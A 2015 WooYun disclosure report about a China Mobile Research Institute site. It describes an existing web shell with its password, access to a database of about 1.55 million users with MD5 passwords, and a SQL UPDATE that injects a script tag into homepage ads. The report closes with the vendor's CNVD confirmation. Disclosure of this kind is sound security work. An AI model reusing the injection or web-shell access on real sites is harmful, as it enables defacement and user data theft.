中国移动研究院存在web后门\155W用户数据或泄漏\可通过SQL篡改网站首页 | wooyun-2015-0142191

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0142191

漏洞标题：

中国移动研究院存在web后门\155W用户数据或泄漏\可通过SQL篡改网站首页

漏洞详情

披露状态：

2015-09-22：细节已通知厂商并且等待厂商处理中
2015-09-24：厂商已经确认，细节仅向厂商公开
2015-10-04：细节向核心白帽子及相关领域专家公开
2015-10-14：细节向普通白帽子公开
2015-10-24：细节向实习白帽子公开
2015-11-08：细节向公众公开

简要描述：

详细说明：

中国移动研究院 **.**.**.**

http://**.**.**.**/minetypes_arr.php 密码wooyun

我们找找数据库连接信息：
/includes/DBConnection.php

155W用户啊，密码是MD5加密

这些数据应该或多或少都有点价值吧:))

好继续看SQL是如何篡改网站主页的
我们没有/var/www/目录下写文件的权限，因此通过修改php文件来直接篡改是不可行的。

然而 http://**.**.**.** 首页通过 /ad/show.php?posid=$id 来插入广告

/ad/show.php?posid=18 返回的内容：

document.write('<a target=\'_blank\' href=\'http://**.**.**.**/ad/hits.php?id=151\'><img src=\'/admin/uploads/UploadImages/20150513/18618_1.E4B880E8B5B7E5AE98E7BD91E59BBE_E589AFE69CAC3.png\' width=\'299\' height=\'137\' /></a>');

我们再看看/ad/show.php的源码:

这里直接从数据库中读取广告图片的路径并输出，那么只要我们修改数据库中路径的记录就可以插入js代码。

update ictspace_ad_list set ad_img='\\\'><img src=\\\'/admin/uploads/UploadImages/20150521/83985_E5AE89E585A8E6B58BE8AF84banner700_84.jpg' where id=172

现在访问http://**.**.**.**/ad/show.php?posid=15：

document.write('<a target=\'_blank\' href=\'http://**.**.**.**/ad/hits.php?id=172\'><img src=\'\'><script src=\'\/upload\/ad.js\'></script><img src=\'/admin/uploads/UploadImages/20150521/83985_E5AE89E585A8E6B58BE8AF84banner700_84.jpg\' width=\'701\' height=\'84\' /></a>');

成功辣：

注入js之后想干啥就干啥你懂的(
附送个http://**.**.**.**/ict8的uckey

漏洞证明：

如上。

修复方案：

._. 高数好难啊

版权声明：转载请注明来源超威蓝猫@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-09-24 16:08

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源超威蓝猫@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 超威蓝猫@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源超威蓝猫@乌云